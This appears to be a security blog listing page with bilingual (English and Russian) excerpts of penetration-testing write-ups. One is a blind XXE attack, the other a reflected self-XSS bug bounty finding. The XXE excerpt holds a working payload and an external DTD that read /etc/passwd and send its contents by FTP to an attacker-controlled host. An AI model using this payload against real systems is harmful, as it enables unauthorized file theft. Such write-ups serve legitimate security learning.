XXE OOB extracting via HTTP+FTP using single opened port

Suppose we have discovered a XXE-vulnerability and trying to do blind OOB local files content extraction.
There are some different ways to do this. I recently had to use FTP-extraction (AFAIK, this was due to vulnerable service Java version – it didn’t allowed the HTTP-extraction of some files, e.g. /etc/passwd).

I have used the following vector:

1
2
3
4
5
6
7
8
< ?xml version="1.0" ?>
< !DOCTYPE r [
<!ELEMENT r ANY >
< !ENTITY % sp SYSTEM "http://host:1111/ext.dtd">
%sp;
%param1;
]>
<r>&exfil;</r>

and have place at http://host:1111/ext.dtd the following DTD:

1
2
< !ENTITY % data SYSTEM "file:///etc/passwd">
< !ENTITY % param1 "<!ENTITY exfil SYSTEM 'ftp://host:2222/%data;'>">

This works the following way:
1. Processing the XML source, vulnerable app loads external DTD schema via HTTP from http://host:1111/ext.dtd
2. Processing the loaded schema, the app loads local file /etc/passwd and tries to load external entity exfil via FTP from ftp://host:2222/%data;, where the %data; is replaced by /etc/passwd content by XML parser. Thus, if we control the FTP server, we can easily read extracted data.

And everything would be fine, but the vulnerable server firewall has allowed only 3785 port outgoing connections, and we needed to make 2 requests: over HTTP and then over FTP. So, I had to think, how to process both protocols using one single port 🙂

Continue reading →

  •  
  •  
  •  
  •  
  •  
  •  
  •  
  •  
  •  

How I have exploited reflected self-XSS or CORS is not the end

The other day I have stumbled upon the reflected self-XSS. It is OK, if the self-XSS is stored – in this case the injected code is stored inside some application area, which is available only for the same user, that could inject the code there, for example, inside user personal area. In my case the following has occurred: I had discovered the link, vulnerable to classical reflected XSS and reported it into BugBounty. It didn’t even occur to check the link transferring to other user. Over time, I have received the report reject because of “can not reproduce”.

It turned out that the vulnerable application has the external sources video uploading function, and this is how it works:

  1. The user presses the “Upload video” button, and the separated video uploading page is opened. Then, as I think, some video dummy is inserted into DB. This dummy has associated video ID like 10345 already (this ID is visible inside the page source).
  2. The user selects the “Upload from external source” item and the other separated page with URL like
    /uploadExt?videoId=10345&amp;vulnerableParam=test is opened. This is exactly the same page, that is vulnerable for XSS via vulnerableParam parameter.

The problem was that the vulnerable link couldn’t be transferred to other user, as he had no access to video with this ID, so the user has got the 403 Unauthorized server error. Thus, the user could be attacked only if he has initiated the video uploading process by himself and has navigated to vulnerable URL containing his own videoId.

Read further, what have I tried to bypass this limitation and what have I achieved 🙂
Continue reading →

XXE – OOB-извлечение данных по HTTP+FTP через единственный открытый порт

Предположим, мы нашли XXE-уязвимость и пытаемся организовать OOB-извлечение содержимого локальных файлов уязвимого сервера.
Существуют несколько различных способов проделать это, а мне недавно пришлось использовать извлечение по FTP-протоколу (насколько я понимаю, это было связано с версией Java уязвимого сервиса – она не позволяла извлекать содержимое, например, /etc/passwd, по HTTP).

Я использовал такой вектор:

1
2
3
4
5
6
7
8
< ?xml version="1.0" ?>
< !DOCTYPE r [
<!ELEMENT r ANY >
< !ENTITY % sp SYSTEM "http://host:1111/ext.dtd">
%sp;
%param1;
]>
<r>&exfil;</r>

и разметил по адресу http://host:1111/ext.dtd следующий DTD:

1
2
< !ENTITY % data SYSTEM "file:///etc/passwd">
< !ENTITY % param1 "<!ENTITY exfil SYSTEM 'ftp://host:2222/%data;'>">

Работает вектор следующим образом:
1. При обработке исходного XML уязвимое приложение подгружает внешнюю схему через HTTP по адресу http://host:1111/ext.dtd
2. При обработке загруженной схемы считывается локальный файл /etc/passwd и происходит попытка подгрузки внешней сущности exfil через FTP по адресу ftp://host:2222/%data;, где вместо %data; парсер подставит содержимое подгруженного /etc/passwd. Соответственно, контролируя FTP-сервер, мы легко прочитаем извлеченные данные.

И наверное все сработало бы как надо, если бы ни одно «но» – на серверном файерволле были разрешены исходящие соединения только на один единственный порт 3785, а необходимо было обеспечить 2 исходящих соединения: по HTTP, а потом по FTP. Пришлось подключать смекалку и думать, как корректно обработать два разных протокола на одном порту 🙂

Читать далее →

  •  
  •  
  •  
  •  
  •  
  •  
  •  
  •  
  •  

Как я отраженную self-XSS эксплуатировал или CORS – не приговор

На днях впервые наткнулся на отраженную self-XSS. Все просто, когда self-XSS хранимая – в таком случае внедряемый код сохраняется в некоей области приложения, которая доступна лишь пользователю, который туда это код смог поместить, например, в личном кабинете. В моем же случае произошло следующее: нашел ссылку, которая была уязвима к классической отраженной XSS, зарепортил в BugBounty (даже в голову не пришло пробовать передавать ее другому аккаунту). Через некоторое время получил ответ, что уязвимость не воспроизводится – стал разбираться.

Оказалось вот что: в уязвимом приложении был реализован механизм загрузки видео со сторонних сервисов и реализован был следующим образом:

  1. Пользователь нажимает кнопку «загрузить видео», открывается отдельная страница загрузки. В этот момент в базе создается, видимо, некоторая заглушка видео с уже присвоенным ему ID вида 10345 (ID виден в скрипте в исходном коде страницы).
  2. Пользователь выбирает пункт «загрузить со стороннего ресурса», в этот момент открывается новая страница с URL вида
    /uploadExt?videoId=10345&amp;vulnerableParam=test, которая как раз была уязвима к XSS через параметр vulnerableParam.

Проблема заключалась в том, что уязвимую ссылку нельзя было передать другому пользователю, так как он не имел доступа к видео с таким ID и получал в ответ 403 Unauthorized. В итоге выходило, что пользователь мог быть атакован только если он сам начал загрузку видео и переходил по ссылке со своим собственным videoId. Какие варианты я пробовал для обхода данного ограничения и что получилось в итоге – читайте ниже 🙂
Читать далее →